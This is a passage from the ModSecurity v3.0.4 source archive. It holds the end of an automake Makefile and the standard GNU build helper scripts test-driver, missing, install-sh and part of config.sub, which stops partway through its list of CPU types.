mostlyclean-generic mostlyclean-libtool pdf: pdf-recursive pdf-am: ps: ps-recursive ps-am: uninstall-am: uninstall-pkgconfigDATA .MAKE: $(am__recursive_targets) check-am install-am install-strip .PHONY: $(am__recursive_targets) CTAGS GTAGS TAGS all all-am \ am--refresh check check-TESTS check-am clean clean-cscope \ clean-generic clean-libtool cscope cscopelist-am ctags \ ctags-am dist dist-all dist-bzip2 dist-gzip dist-lzip \ dist-shar dist-tarZ dist-xz dist-zip distcheck distclean \ distclean-generic distclean-libtool distclean-tags \ distcleancheck distdir distuninstallcheck dvi dvi-am html \ html-am info info-am install install-am install-data \ install-data-am install-dvi install-dvi-am install-exec \ install-exec-am install-html install-html-am install-info \ install-info-am install-man install-pdf install-pdf-am \ install-pkgconfigDATA install-ps install-ps-am install-strip \ installcheck installcheck-am installdirs installdirs-am \ maintainer-clean maintainer-clean-generic mostlyclean \ mostlyclean-generic mostlyclean-libtool pdf pdf-am ps ps-am \ recheck tags tags-am uninstall uninstall-am \ uninstall-pkgconfigDATA .PRECIOUS: Makefile @TEST_UTILITIES_TRUE@export MAYBE_TEST = test @EXAMPLES_TRUE@export MAYBE_EXAMPLES = examples parser: cat src/parser/seclang-parser.hh | sed "s/return \*new (yyas_ ()) T (t)/return *new (yyas_ ()) T (std::move((T\&)t))/g" > src/parser/seclang-parser.hh.fix && mv src/parser/seclang-parser.hh.fix src/parser/seclang-parser.hh cppcheck: @cppcheck \ --suppressions-list=./test/cppcheck_suppressions.txt \ --enable=all \ --inconclusive \ --template="warning: {file},{line},{severity},{id},{message}" \ --std=posix . 2> cppcheck.txt cat cppcheck.txt | grep -v "/ lalr1.cc" check-static: cppcheck check-style: check-coding-style check-coding-style: @cpplint.py \ $$(find . -name "*.h" -o -name "*.cc" | xargs) 2>&1 \ | egrep -v $$(echo -n "catchall" ; \ for i in $$(cat test/coding_style_suppressions.txt); do echo -n "|"$$i; done) \ | sed 's/^\./warning: ./g' > coding-style.txt -cat coding-style.txt @VALGRIND_CHECK_RULES@ # Tell versions [3.59,3.63) of GNU make to not export all variables. # Otherwise a system limit (for SysV at least) may be exceeded. .NOEXPORT: modsecurity-v3.0.4/test-driver0000755000175000017500000001104213607066346016714 0ustar zimmerlezimmerle#! /bin/sh # test-driver - basic testsuite driver script. scriptversion=2018-03-07.03; # UTC # Copyright (C) 2011-2018 Free Software Foundation, Inc. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2, or (at your option) # any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . # As a special exception to the GNU General Public License, if you # distribute this file as part of a program that contains a # configuration script generated by Autoconf, you may include it under # the same distribution terms that you use for the rest of that program. # This file is maintained in Automake, please report # bugs to or send patches to # . # Make unconditional expansion of undefined variables an error. This # helps a lot in preventing typo-related bugs. set -u usage_error () { echo "$0: $*" >&2 print_usage >&2 exit 2 } print_usage () { cat <$log_file 2>&1 estatus=$? if test $enable_hard_errors = no && test $estatus -eq 99; then tweaked_estatus=1 else tweaked_estatus=$estatus fi case $tweaked_estatus:$expect_failure in 0:yes) col=$red res=XPASS recheck=yes gcopy=yes;; 0:*) col=$grn res=PASS recheck=no gcopy=no;; 77:*) col=$blu res=SKIP recheck=no gcopy=yes;; 99:*) col=$mgn res=ERROR recheck=yes gcopy=yes;; *:yes) col=$lgn res=XFAIL recheck=no gcopy=yes;; *:*) col=$red res=FAIL recheck=yes gcopy=yes;; esac # Report the test outcome and exit status in the logs, so that one can # know whether the test passed or failed simply by looking at the '.log' # file, without the need of also peaking into the corresponding '.trs' # file (automake bug#11814). echo "$res $test_name (exit status: $estatus)" >>$log_file # Report outcome to console. echo "${col}${res}${std}: $test_name" # Register the test result, and other relevant metadata. echo ":test-result: $res" > $trs_file echo ":global-test-result: $res" >> $trs_file echo ":recheck: $recheck" >> $trs_file echo ":copy-in-global-log: $gcopy" >> $trs_file # Local Variables: # mode: shell-script # sh-indentation: 2 # eval: (add-hook 'before-save-hook 'time-stamp) # time-stamp-start: "scriptversion=" # time-stamp-format: "%:y-%02m-%02d.%02H" # time-stamp-time-zone: "UTC0" # time-stamp-end: "; # UTC" # End: modsecurity-v3.0.4/missing0000755000175000017500000001533613607066346016127 0ustar zimmerlezimmerle#! /bin/sh # Common wrapper for a few potentially missing GNU programs. scriptversion=2018-03-07.03; # UTC # Copyright (C) 1996-2018 Free Software Foundation, Inc. # Originally written by Fran,cois Pinard , 1996. # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2, or (at your option) # any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with this program. If not, see . # As a special exception to the GNU General Public License, if you # distribute this file as part of a program that contains a # configuration script generated by Autoconf, you may include it under # the same distribution terms that you use for the rest of that program. if test $# -eq 0; then echo 1>&2 "Try '$0 --help' for more information" exit 1 fi case $1 in --is-lightweight) # Used by our autoconf macros to check whether the available missing # script is modern enough. exit 0 ;; --run) # Back-compat with the calling convention used by older automake. shift ;; -h|--h|--he|--hel|--help) echo "\ $0 [OPTION]... PROGRAM [ARGUMENT]... Run 'PROGRAM [ARGUMENT]...', returning a proper advice when this fails due to PROGRAM being missing or too old. Options: -h, --help display this help and exit -v, --version output version information and exit Supported PROGRAM values: aclocal autoconf autoheader autom4te automake makeinfo bison yacc flex lex help2man Version suffixes to PROGRAM as well as the prefixes 'gnu-', 'gnu', and 'g' are ignored when checking the name. Send bug reports to ." exit $? ;; -v|--v|--ve|--ver|--vers|--versi|--versio|--version) echo "missing $scriptversion (GNU Automake)" exit $? ;; -*) echo 1>&2 "$0: unknown '$1' option" echo 1>&2 "Try '$0 --help' for more information" exit 1 ;; esac # Run the given program, remember its exit status. "$@"; st=$? # If it succeeded, we are done. test $st -eq 0 && exit 0 # Also exit now if we it failed (or wasn't found), and '--version' was # passed; such an option is passed most likely to detect whether the # program is present and works. case $2 in --version|--help) exit $st;; esac # Exit code 63 means version mismatch. This often happens when the user # tries to use an ancient version of a tool on a file that requires a # minimum version. if test $st -eq 63; then msg="probably too old" elif test $st -eq 127; then # Program was missing. msg="missing on your system" else # Program was found and executed, but failed. Give up. exit $st fi perl_URL=https://www.perl.org/ flex_URL=https://github.com/westes/flex gnu_software_URL=https://www.gnu.org/software program_details () { case $1 in aclocal|automake) echo "The '$1' program is part of the GNU Automake package:" echo "<$gnu_software_URL/automake>" echo "It also requires GNU Autoconf, GNU m4 and Perl in order to run:" echo "<$gnu_software_URL/autoconf>" echo "<$gnu_software_URL/m4/>" echo "<$perl_URL>" ;; autoconf|autom4te|autoheader) echo "The '$1' program is part of the GNU Autoconf package:" echo "<$gnu_software_URL/autoconf/>" echo "It also requires GNU m4 and Perl in order to run:" echo "<$gnu_software_URL/m4/>" echo "<$perl_URL>" ;; esac } give_advice () { # Normalize program name to check for. normalized_program=`echo "$1" | sed ' s/^gnu-//; t s/^gnu//; t s/^g//; t'` printf '%s\n' "'$1' is $msg." configure_deps="'configure.ac' or m4 files included by 'configure.ac'" case $normalized_program in autoconf*) echo "You should only need it if you modified 'configure.ac'," echo "or m4 files included by it." program_details 'autoconf' ;; autoheader*) echo "You should only need it if you modified 'acconfig.h' or" echo "$configure_deps." program_details 'autoheader' ;; automake*) echo "You should only need it if you modified 'Makefile.am' or" echo "$configure_deps." program_details 'automake' ;; aclocal*) echo "You should only need it if you modified 'acinclude.m4' or" echo "$configure_deps." program_details 'aclocal' ;; autom4te*) echo "You might have modified some maintainer files that require" echo "the 'autom4te' program to be rebuilt." program_details 'autom4te' ;; bison*|yacc*) echo "You should only need it if you modified a '.y' file." echo "You may want to install the GNU Bison package:" echo "<$gnu_software_URL/bison/>" ;; lex*|flex*) echo "You should only need it if you modified a '.l' file." echo "You may want to install the Fast Lexical Analyzer package:" echo "<$flex_URL>" ;; help2man*) echo "You should only need it if you modified a dependency" \ "of a man page." echo "You may want to install the GNU Help2man package:" echo "<$gnu_software_URL/help2man/>" ;; makeinfo*) echo "You should only need it if you modified a '.texi' file, or" echo "any other file indirectly affecting the aspect of the manual." echo "You might want to install the Texinfo package:" echo "<$gnu_software_URL/texinfo/>" echo "The spurious makeinfo call might also be the consequence of" echo "using a buggy 'make' (AIX, DU, IRIX), in which case you might" echo "want to install GNU make:" echo "<$gnu_software_URL/make/>" ;; *) echo "You might have modified some files without having the proper" echo "tools for further handling them. Check the 'README' file, it" echo "often tells you about the needed prerequisites for installing" echo "this package. You may also peek at any GNU archive site, in" echo "case some other package contains this missing '$1' program." ;; esac } give_advice "$1" | sed -e '1s/^/WARNING: /' \ -e '2,$s/^/ /' >&2 # Propagate the correct exit status (expected to be 127 for a program # not found, 63 for a program that failed due to version mismatch). exit $st # Local variables: # eval: (add-hook 'before-save-hook 'time-stamp) # time-stamp-start: "scriptversion=" # time-stamp-format: "%:y-%02m-%02d.%02H" # time-stamp-time-zone: "UTC0" # time-stamp-end: "; # UTC" # End: modsecurity-v3.0.4/install-sh0000755000175000017500000003601013607066346016524 0ustar zimmerlezimmerle#!/bin/sh # install - install a program, script, or datafile scriptversion=2018-03-11.20; # UTC # This originates from X11R5 (mit/util/scripts/install.sh), which was # later released in X11R6 (xc/config/util/install.sh) with the # following copyright and license. # # Copyright (C) 1994 X Consortium # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to # deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # X CONSORTIUM BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN # AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNEC- # TION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # # Except as contained in this notice, the name of the X Consortium shall not # be used in advertising or otherwise to promote the sale, use or other deal- # ings in this Software without prior written authorization from the X Consor- # tium. # # # FSF changes to this file are in the public domain. # # Calling this script install-sh is preferred over install.sh, to prevent # 'make' implicit rules from creating a file called install from it # when there is no Makefile. # # This script is compatible with the BSD install script, but was written # from scratch. tab=' ' nl=' ' IFS=" $tab$nl" # Set DOITPROG to "echo" to test this script. doit=${DOITPROG-} doit_exec=${doit:-exec} # Put in absolute file names if you don't have them in your path; # or use environment vars. chgrpprog=${CHGRPPROG-chgrp} chmodprog=${CHMODPROG-chmod} chownprog=${CHOWNPROG-chown} cmpprog=${CMPPROG-cmp} cpprog=${CPPROG-cp} mkdirprog=${MKDIRPROG-mkdir} mvprog=${MVPROG-mv} rmprog=${RMPROG-rm} stripprog=${STRIPPROG-strip} posix_mkdir= # Desired mode of installed file. mode=0755 chgrpcmd= chmodcmd=$chmodprog chowncmd= mvcmd=$mvprog rmcmd="$rmprog -f" stripcmd= src= dst= dir_arg= dst_arg= copy_on_change=false is_target_a_directory=possibly usage="\ Usage: $0 [OPTION]... [-T] SRCFILE DSTFILE or: $0 [OPTION]... SRCFILES... DIRECTORY or: $0 [OPTION]... -t DIRECTORY SRCFILES... or: $0 [OPTION]... -d DIRECTORIES... In the 1st form, copy SRCFILE to DSTFILE. In the 2nd and 3rd, copy all SRCFILES to DIRECTORY. In the 4th, create DIRECTORIES. Options: --help display this help and exit. --version display version info and exit. -c (ignored) -C install only if different (preserve the last data modification time) -d create directories instead of installing files. -g GROUP $chgrpprog installed files to GROUP. -m MODE $chmodprog installed files to MODE. -o USER $chownprog installed files to USER. -s $stripprog installed files. -t DIRECTORY install into DIRECTORY. -T report an error if DSTFILE is a directory. Environment variables override the default commands: CHGRPPROG CHMODPROG CHOWNPROG CMPPROG CPPROG MKDIRPROG MVPROG RMPROG STRIPPROG " while test $# -ne 0; do case $1 in -c) ;; -C) copy_on_change=true;; -d) dir_arg=true;; -g) chgrpcmd="$chgrpprog $2" shift;; --help) echo "$usage"; exit $?;; -m) mode=$2 case $mode in *' '* | *"$tab"* | *"$nl"* | *'*'* | *'?'* | *'['*) echo "$0: invalid mode: $mode" >&2 exit 1;; esac shift;; -o) chowncmd="$chownprog $2" shift;; -s) stripcmd=$stripprog;; -t) is_target_a_directory=always dst_arg=$2 # Protect names problematic for 'test' and other utilities. case $dst_arg in -* | [=\(\)!]) dst_arg=./$dst_arg;; esac shift;; -T) is_target_a_directory=never;; --version) echo "$0 $scriptversion"; exit $?;; --) shift break;; -*) echo "$0: invalid option: $1" >&2 exit 1;; *) break;; esac shift done # We allow the use of options -d and -T together, by making -d # take the precedence; this is for compatibility with GNU install. if test -n "$dir_arg"; then if test -n "$dst_arg"; then echo "$0: target directory not allowed when installing a directory." >&2 exit 1 fi fi if test $# -ne 0 && test -z "$dir_arg$dst_arg"; then # When -d is used, all remaining arguments are directories to create. # When -t is used, the destination is already specified. # Otherwise, the last argument is the destination. Remove it from $@. for arg do if test -n "$dst_arg"; then # $@ is not empty: it contains at least $arg. set fnord "$@" "$dst_arg" shift # fnord fi shift # arg dst_arg=$arg # Protect names problematic for 'test' and other utilities. case $dst_arg in -* | [=\(\)!]) dst_arg=./$dst_arg;; esac done fi if test $# -eq 0; then if test -z "$dir_arg"; then echo "$0: no input file specified." >&2 exit 1 fi # It's OK to call 'install-sh -d' without argument. # This can happen when creating conditional directories. exit 0 fi if test -z "$dir_arg"; then if test $# -gt 1 || test "$is_target_a_directory" = always; then if test ! -d "$dst_arg"; then echo "$0: $dst_arg: Is not a directory." >&2 exit 1 fi fi fi if test -z "$dir_arg"; then do_exit='(exit $ret); exit $ret' trap "ret=129; $do_exit" 1 trap "ret=130; $do_exit" 2 trap "ret=141; $do_exit" 13 trap "ret=143; $do_exit" 15 # Set umask so as not to create temps with too-generous modes. # However, 'strip' requires both read and write access to temps. case $mode in # Optimize common cases. *644) cp_umask=133;; *755) cp_umask=22;; *[0-7]) if test -z "$stripcmd"; then u_plus_rw= else u_plus_rw='% 200' fi cp_umask=`expr '(' 777 - $mode % 1000 ')' $u_plus_rw`;; *) if test -z "$stripcmd"; then u_plus_rw= else u_plus_rw=,u+rw fi cp_umask=$mode$u_plus_rw;; esac fi for src do # Protect names problematic for 'test' and other utilities. case $src in -* | [=\(\)!]) src=./$src;; esac if test -n "$dir_arg"; then dst=$src dstdir=$dst test -d "$dstdir" dstdir_status=$? else # Waiting for this to be detected by the "$cpprog $src $dsttmp" command # might cause directories to be created, which would be especially bad # if $src (and thus $dsttmp) contains '*'. if test ! -f "$src" && test ! -d "$src"; then echo "$0: $src does not exist." >&2 exit 1 fi if test -z "$dst_arg"; then echo "$0: no destination specified." >&2 exit 1 fi dst=$dst_arg # If destination is a directory, append the input filename. if test -d "$dst"; then if test "$is_target_a_directory" = never; then echo "$0: $dst_arg: Is a directory" >&2 exit 1 fi dstdir=$dst dstbase=`basename "$src"` case $dst in */) dst=$dst$dstbase;; *) dst=$dst/$dstbase;; esac dstdir_status=0 else dstdir=`dirname "$dst"` test -d "$dstdir" dstdir_status=$? fi fi case $dstdir in */) dstdirslash=$dstdir;; *) dstdirslash=$dstdir/;; esac obsolete_mkdir_used=false if test $dstdir_status != 0; then case $posix_mkdir in '') # Create intermediate dirs using mode 755 as modified by the umask. # This is like FreeBSD 'install' as of 1997-10-28. umask=`umask` case $stripcmd.$umask in # Optimize common cases. *[2367][2367]) mkdir_umask=$umask;; .*0[02][02] | .[02][02] | .[02]) mkdir_umask=22;; *[0-7]) mkdir_umask=`expr $umask + 22 \ - $umask % 100 % 40 + $umask % 20 \ - $umask % 10 % 4 + $umask % 2 `;; *) mkdir_umask=$umask,go-w;; esac # With -d, create the new directory with the user-specified mode. # Otherwise, rely on $mkdir_umask. if test -n "$dir_arg"; then mkdir_mode=-m$mode else mkdir_mode= fi posix_mkdir=false case $umask in *[123567][0-7][0-7]) # POSIX mkdir -p sets u+wx bits regardless of umask, which # is incompatible with FreeBSD 'install' when (umask & 300) != 0. ;; *) # Note that $RANDOM variable is not portable (e.g. dash); Use it # here however when possible just to lower collision chance. tmpdir=${TMPDIR-/tmp}/ins$RANDOM-$$ trap 'ret=$?; rmdir "$tmpdir/a/b" "$tmpdir/a" "$tmpdir" 2>/dev/null; exit $ret' 0 # Because "mkdir -p" follows existing symlinks and we likely work # directly in world-writeable /tmp, make sure that the '$tmpdir' # directory is successfully created first before we actually test # 'mkdir -p' feature. if (umask $mkdir_umask && $mkdirprog $mkdir_mode "$tmpdir" && exec $mkdirprog $mkdir_mode -p -- "$tmpdir/a/b") >/dev/null 2>&1 then if test -z "$dir_arg" || { # Check for POSIX incompatibilities with -m. # HP-UX 11.23 and IRIX 6.5 mkdir -m -p sets group- or # other-writable bit of parent directory when it shouldn't. # FreeBSD 6.1 mkdir -m -p sets mode of existing directory. test_tmpdir="$tmpdir/a" ls_ld_tmpdir=`ls -ld "$test_tmpdir"` case $ls_ld_tmpdir in d????-?r-*) different_mode=700;; d????-?--*) different_mode=755;; *) false;; esac && $mkdirprog -m$different_mode -p -- "$test_tmpdir" && { ls_ld_tmpdir_1=`ls -ld "$test_tmpdir"` test "$ls_ld_tmpdir" = "$ls_ld_tmpdir_1" } } then posix_mkdir=: fi rmdir "$tmpdir/a/b" "$tmpdir/a" "$tmpdir" else # Remove any dirs left behind by ancient mkdir implementations. rmdir ./$mkdir_mode ./-p ./-- "$tmpdir" 2>/dev/null fi trap '' 0;; esac;; esac if $posix_mkdir && ( umask $mkdir_umask && $doit_exec $mkdirprog $mkdir_mode -p -- "$dstdir" ) then : else # The umask is ridiculous, or mkdir does not conform to POSIX, # or it failed possibly due to a race condition. Create the # directory the slow way, step by step, checking for races as we go. case $dstdir in /*) prefix='/';; [-=\(\)!]*) prefix='./';; *) prefix='';; esac oIFS=$IFS IFS=/ set -f set fnord $dstdir shift set +f IFS=$oIFS prefixes= for d do test X"$d" = X && continue prefix=$prefix$d if test -d "$prefix"; then prefixes= else if $posix_mkdir; then (umask=$mkdir_umask && $doit_exec $mkdirprog $mkdir_mode -p -- "$dstdir") && break # Don't fail if two instances are running concurrently. test -d "$prefix" || exit 1 else case $prefix in *\'*) qprefix=`echo "$prefix" | sed "s/'/'\\\\\\\\''/g"`;; *) qprefix=$prefix;; esac prefixes="$prefixes '$qprefix'" fi fi prefix=$prefix/ done if test -n "$prefixes"; then # Don't fail if two instances are running concurrently. (umask $mkdir_umask && eval "\$doit_exec \$mkdirprog $prefixes") || test -d "$dstdir" || exit 1 obsolete_mkdir_used=true fi fi fi if test -n "$dir_arg"; then { test -z "$chowncmd" || $doit $chowncmd "$dst"; } && { test -z "$chgrpcmd" || $doit $chgrpcmd "$dst"; } && { test "$obsolete_mkdir_used$chowncmd$chgrpcmd" = false || test -z "$chmodcmd" || $doit $chmodcmd $mode "$dst"; } || exit 1 else # Make a couple of temp file names in the proper directory. dsttmp=${dstdirslash}_inst.$$_ rmtmp=${dstdirslash}_rm.$$_ # Trap to clean up those temp files at exit. trap 'ret=$?; rm -f "$dsttmp" "$rmtmp" && exit $ret' 0 # Copy the file name to the temp name. (umask $cp_umask && $doit_exec $cpprog "$src" "$dsttmp") && # and set any options; do chmod last to preserve setuid bits. # # If any of these fail, we abort the whole thing. If we want to # ignore errors from any of these, just make sure not to ignore # errors from the above "$doit $cpprog $src $dsttmp" command. # { test -z "$chowncmd" || $doit $chowncmd "$dsttmp"; } && { test -z "$chgrpcmd" || $doit $chgrpcmd "$dsttmp"; } && { test -z "$stripcmd" || $doit $stripcmd "$dsttmp"; } && { test -z "$chmodcmd" || $doit $chmodcmd $mode "$dsttmp"; } && # If -C, don't bother to copy if it wouldn't change the file. if $copy_on_change && old=`LC_ALL=C ls -dlL "$dst" 2>/dev/null` && new=`LC_ALL=C ls -dlL "$dsttmp" 2>/dev/null` && set -f && set X $old && old=:$2:$4:$5:$6 && set X $new && new=:$2:$4:$5:$6 && set +f && test "$old" = "$new" && $cmpprog "$dst" "$dsttmp" >/dev/null 2>&1 then rm -f "$dsttmp" else # Rename the file to the real destination. $doit $mvcmd -f "$dsttmp" "$dst" 2>/dev/null || # The rename failed, perhaps because mv can't rename something else # to itself, or perhaps because mv is so ancient that it does not # support -f. { # Now remove or move aside any old file at destination location. # We try this two ways since rm can't unlink itself on some # systems and the destination file might be busy for other # reasons. In this case, the final cleanup might fail but the new # file should still install successfully. { test ! -f "$dst" || $doit $rmcmd -f "$dst" 2>/dev/null || { $doit $mvcmd -f "$dst" "$rmtmp" 2>/dev/null && { $doit $rmcmd -f "$rmtmp" 2>/dev/null; :; } } || { echo "$0: cannot unlink or rename $dst" >&2 (exit 1); exit 1 } } && # Now rename the file to the real destination. $doit $mvcmd "$dsttmp" "$dst" } fi || exit 1 trap '' 0 fi done # Local variables: # eval: (add-hook 'before-save-hook 'time-stamp) # time-stamp-start: "scriptversion=" # time-stamp-format: "%:y-%02m-%02d.%02H" # time-stamp-time-zone: "UTC0" # time-stamp-end: "; # UTC" # End: modsecurity-v3.0.4/config.sub0000755000175000017500000010645513607066346016516 0ustar zimmerlezimmerle#! /bin/sh # Configuration validation subroutine script. # Copyright 1992-2018 Free Software Foundation, Inc. timestamp='2018-03-08' # This file is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, see . # # As a special exception to the GNU General Public License, if you # distribute this file as part of a program that contains a # configuration script generated by Autoconf, you may include it under # the same distribution terms that you use for the rest of that # program. This Exception is an additional permission under section 7 # of the GNU General Public License, version 3 ("GPLv3"). # Please send patches to . # # Configuration subroutine to validate and canonicalize a configuration type. # Supply the specified configuration type as an argument. # If it is invalid, we print an error message on stderr and exit with code 1. # Otherwise, we print the canonical config type on stdout and succeed. # You can get the latest version of this script from: # https://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=config.sub # This file is supposed to be the same for all GNU packages # and recognize all the CPU types, system types and aliases # that are meaningful with *any* GNU software. # Each package is responsible for reporting which valid configurations # it does not support. The user should be able to distinguish # a failure to support a valid configuration from a meaningless # configuration. # The goal of this file is to map all the various variations of a given # machine specification into a single specification in the form: # CPU_TYPE-MANUFACTURER-OPERATING_SYSTEM # or in some cases, the newer four-part form: # CPU_TYPE-MANUFACTURER-KERNEL-OPERATING_SYSTEM # It is wrong to echo any other type of specification. me=`echo "$0" | sed -e 's,.*/,,'` usage="\ Usage: $0 [OPTION] CPU-MFR-OPSYS or ALIAS Canonicalize a configuration name. Options: -h, --help print this help, then exit -t, --time-stamp print date of last modification, then exit -v, --version print version number, then exit Report bugs and patches to ." version="\ GNU config.sub ($timestamp) Copyright 1992-2018 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE." help=" Try \`$me --help' for more information." # Parse command line while test $# -gt 0 ; do case $1 in --time-stamp | --time* | -t ) echo "$timestamp" ; exit ;; --version | -v ) echo "$version" ; exit ;; --help | --h* | -h ) echo "$usage"; exit ;; -- ) # Stop option processing shift; break ;; - ) # Use stdin as input. break ;; -* ) echo "$me: invalid option $1$help" exit 1 ;; *local*) # First pass through any local machine types. echo "$1" exit ;; * ) break ;; esac done case $# in 0) echo "$me: missing argument$help" >&2 exit 1;; 1) ;; *) echo "$me: too many arguments$help" >&2 exit 1;; esac # Separate what the user gave into CPU-COMPANY and OS or KERNEL-OS (if any). # Here we must recognize all the valid KERNEL-OS combinations. maybe_os=`echo "$1" | sed 's/^\(.*\)-\([^-]*-[^-]*\)$/\2/'` case $maybe_os in nto-qnx* | linux-gnu* | linux-android* | linux-dietlibc | linux-newlib* | \ linux-musl* | linux-uclibc* | uclinux-uclibc* | uclinux-gnu* | kfreebsd*-gnu* | \ knetbsd*-gnu* | netbsd*-gnu* | netbsd*-eabi* | \ kopensolaris*-gnu* | cloudabi*-eabi* | \ storm-chaos* | os2-emx* | rtmk-nova*) os=-$maybe_os basic_machine=`echo "$1" | sed 's/^\(.*\)-\([^-]*-[^-]*\)$/\1/'` ;; android-linux) os=-linux-android basic_machine=`echo "$1" | sed 's/^\(.*\)-\([^-]*-[^-]*\)$/\1/'`-unknown ;; *) basic_machine=`echo "$1" | sed 's/-[^-]*$//'` if [ "$basic_machine" != "$1" ] then os=`echo "$1" | sed 's/.*-/-/'` else os=; fi ;; esac ### Let's recognize common machines as not being operating systems so ### that things like config.sub decstation-3100 work. We also ### recognize some manufacturers as not being operating systems, so we ### can provide default operating systems below. case $os in -sun*os*) # Prevent following clause from handling this invalid input. ;; -dec* | -mips* | -sequent* | -encore* | -pc532* | -sgi* | -sony* | \ -att* | -7300* | -3300* | -delta* | -motorola* | -sun[234]* | \ -unicom* | -ibm* | -next | -hp | -isi* | -apollo | -altos* | \ -convergent* | -ncr* | -news | -32* | -3600* | -3100* | -hitachi* |\ -c[123]* | -convex* | -sun | -crds | -omron* | -dg | -ultra | -tti* | \ -harris | -dolphin | -highlevel | -gould | -cbm | -ns | -masscomp | \ -apple | -axis | -knuth | -cray | -microblaze*) os= basic_machine=$1 ;; -bluegene*) os=-cnk ;; -sim | -cisco | -oki | -wec | -winbond) os= basic_machine=$1 ;; -scout) ;; -wrs) os=-vxworks basic_machine=$1 ;; -chorusos*) os=-chorusos basic_machine=$1 ;; -chorusrdb) os=-chorusrdb basic_machine=$1 ;; -hiux*) os=-hiuxwe2 ;; -sco6) os=-sco5v6 basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'` ;; -sco5) os=-sco3.2v5 basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'` ;; -sco4) os=-sco3.2v4 basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'` ;; -sco3.2.[4-9]*) os=`echo $os | sed -e 's/sco3.2./sco3.2v/'` basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'` ;; -sco3.2v[4-9]*) # Don't forget version if it is 3.2v4 or newer. basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'` ;; -sco5v6*) # Don't forget version if it is 3.2v4 or newer. basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'` ;; -sco*) os=-sco3.2v2 basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'` ;; -udk*) basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'` ;; -isc) os=-isc2.2 basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'` ;; -clix*) basic_machine=clipper-intergraph ;; -isc*) basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'` ;; -lynx*178) os=-lynxos178 ;; -lynx*5) os=-lynxos5 ;; -lynx*) os=-lynxos ;; -ptx*) basic_machine=`echo "$1" | sed -e 's/86-.*/86-sequent/'` ;; -psos*) os=-psos ;; -mint | -mint[0-9]*) basic_machine=m68k-atari os=-mint ;; esac # Decode aliases for certain CPU-COMPANY combinations. case $basic_machine in # Recognize the basic CPU types without company name. # Some are omitted here because they have special meanings below. 1750a | 580 \ | a29k \ | aarch64 | aarch64_be \ | alpha | alphaev[4-8] | alphaev56 | alphaev6[78] | alphapca5[67] \ | alpha64 | alpha64ev[4-8] | alpha64ev56 | alpha64ev6[78] | alpha64pca5[67] \ | am33_2.0 \ | arc | arceb \ | arm | arm[bl]e | arme[lb] | armv[2-8] | armv[3-8][lb] | armv7[arm] \ | avr | avr32 \ | ba \ | be32 | be64 \ | bfin \ | c4x | c8051 | clipper \ | d10v | d30v | dlx | dsp16xx \ | e2k | epiphany \ | fido | fr30 | frv | ft32 \ | h8300 | h8500 | hppa | hppa1.[01] | hppa2.0 | hppa2.0[nw] | hppa64 \ | hexagon \ | i370 | i860 | i960 | ia16 | ia64 \ | ip2k | iq2000 \ | k1om \ | le32 | le64 \ | lm32 \ | m32c | m32r | m32rle | m68000 | m68k | m88k \ | maxq | mb | microblaze | microblazeel | mcore | mep | metag \ | mips | mipsbe | mipseb | mipsel | mipsle \ | mips16 \ | mips64 | mips64el \ | mips64octeon | mips64octeonel \ | mips64orion | mips64orionel \ | mips64r5900 | mips64r5900el \ | mips64vr | mips64vrel \ | mips64vr4100 | mips64vr4100el \ | mips64vr4300 | mips64vr4300el \ | mips64vr5000 | mips64vr5000el \ | mips64vr5900 | mips64vr5900el \ | mipsisa32 | mipsisa32el \ | mipsisa32r2 | mipsisa32r2el \ | mipsisa32r6 | mipsisa32r6el \ | mipsisa64 | mipsisa64el \ | mipsisa64r2 | mipsisa64r2el \ | mipsisa64r6 | mipsisa64r6el \ | mipsisa64sb1 | mipsisa64sb1el \ | mipsisa64sr71k | mipsisa64sr71kel \ | mipsr5900 | mipsr5900el \ | mipstx39 | mipstx39el \ | mn10200 | mn10300 \ | moxie \ | mt \ | msp430 \ | nds32 | nds32le | nds32be \ | nios | nios2 | nios2eb | nios2el \ | ns16k | ns32k \ | open8 | or1k | or1knd | or32 \ | pdp10 | pj | 